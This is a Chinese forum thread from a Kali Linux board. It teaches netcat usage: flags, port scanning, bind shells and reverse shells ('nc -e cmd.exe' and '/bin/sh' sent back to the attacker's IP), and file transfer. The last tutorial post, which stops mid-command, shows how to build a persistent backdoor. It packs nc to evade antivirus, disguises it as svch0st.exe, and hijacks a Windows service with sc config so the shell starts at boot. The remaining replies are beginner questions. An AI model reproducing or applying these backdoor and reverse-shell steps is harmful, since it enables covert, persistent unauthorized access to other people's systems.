NC(瑞士军刀)使用
kali_linux吧
全部回复
仅看楼主
level 10
NC虽然只有60K
但是它的功能非常强大
只有60K做后门最合适
2013年08月13日 01点08分 1
level 10
简介
瑞士军刀:nc.exe
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i
secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n
IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t
使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z
将输入,输出关掉(用于扫锚时)
2013年08月13日 01点08分 2
level 10
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP
80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l
-p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc
-t -e c:winntsystem32cmd.exe 192.168.0.2 5354
梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
2013年08月13日 01点08分 3
level 10
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 > c:log.txt
作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
nc -L -p 80 <
c:honeyport.txt
作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exe
c:honeyport | nc -L -p 80
作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l
-p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p
本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 <
要传送的文件路径及名称
在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称传送文件到对方主机
2013年08月13日 01点08分 4
level 10
备 注:
管道命令
< 或 > 重定向命令。“<”,例如:tlntadmn < test.txt
指把test.txt的内容赋值给tlntadmn命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >>
d:log.txt
意思是:后台执行dir,并把结果存在d:log.txt中
>与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。
如:@dir
c:winnt >> d:log.txt和@dir c:winnt >
d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
2013年08月13日 01点08分 5
level 10
nc制作简单后门
首先请准备好不被杀的nc.exe(随便加个壳就可以了的),还有sc.exe(这个是操作服务的一个小工具,被人称为操作服务的军刀),这些就可以打造我们自己的后门了,后门的要求我想不需要很强的操作功能,只需要当我们连接的时候获得一个system权限的shell就可以了,有了cmdshell做什么不可以呢。如果你需要反弹的后门,也可以做到,自己注册个域名就可以用nc反弹了,因为比较复杂这里就不说了。我们知道nc就是实现我们的后门功能的最经典的工具,我们来看看nc的帮助,命令行下输入nc -h就可以看到,我们主要用到的几个参数如下:
-e 绑定一个程序并且连接时执行
-l 监听模式
-p 指定nc要运行的本地端口
-L 增强了的监听模式,当连接断开时再次监听
至于其他的用法相信各位已经很了解了的,我们以前经常用到的是
nc -l -e cmd.exe -p 8888 \\监听8888端口,当有连接时重定向到cmd.exe实现绑定一个shell\\
这样的形式用serveru等溢出程序执行后来绑定一个可以得到shell的端口8888,我们telnet或者nc连接上来的时候就可以直接获得一个shell。但是这样连接断开之后监听的端口就会关闭,是一次性的,不能再次获得shell,这样当然不适合于做后门了。后来发现nc的这个参数L可以一直保持监听的状态,可以反复连接。用
nc -L -e cmd.exe -p 8888 \\也是绑定的,不过加强了的\\
这样的命令就已经达到我们的目的了,但是我们往往是在溢出的shell里工作,留后门是为了以后的进入,那我们如何保证nc再机器重起之后还可以工作从而实现我们的后门的目的呢?你可以把他放到注册表的Run等启动项下面,但是感觉那样不是太好,有些地方已经被杀毒软件盯上了,把我的后门放到那里实在不是很放心,后来想到干脆作成服务吧!随着系统启动而启动,呵呵。那就看看如何打造服务吧!
首先我们将nc.exe放到%systemroot%\system32下面,起名叫svch0st.exe或者放到%systemroot%\system下面更名叫svchost.exe,这样的目的是为了在任务管理器里看不出异样。然后用sc替换系统的服务,不用改别的,只要修改他的执行路径就可以了,我们就改那个clipsrv.exe服务吧!命令如下:
sc config clipsrv start= auto \\将clipsrv.exe服务设置为自动\\
sc config cli
2013年08月13日 02点08分 7
Cmd line: nc: forward host lookup failed: Unknown host 哥 怎么办
2019年01月09日 07点01分
level 2
2013年08月16日 03点08分 8
level 14
2013年08月26日 04点08分 9
level 8
[惊讶]不明觉厉,小白求指导。
2013年08月29日 11点08分 10
level 5
我只有一个问题,win7以致win8能用吗?我这边好多小工具都不能用很久了,我自己又懒得写
2013年10月08日 08点10分 11
level 1
大神啊,大神求教。。。。加个Q吗?
2018年08月21日 10点08分 12
level 1
Cmd line: nc
nc: forward host lookup failed: Unknown host
大神就指导
2019年01月09日 07点01分 13
1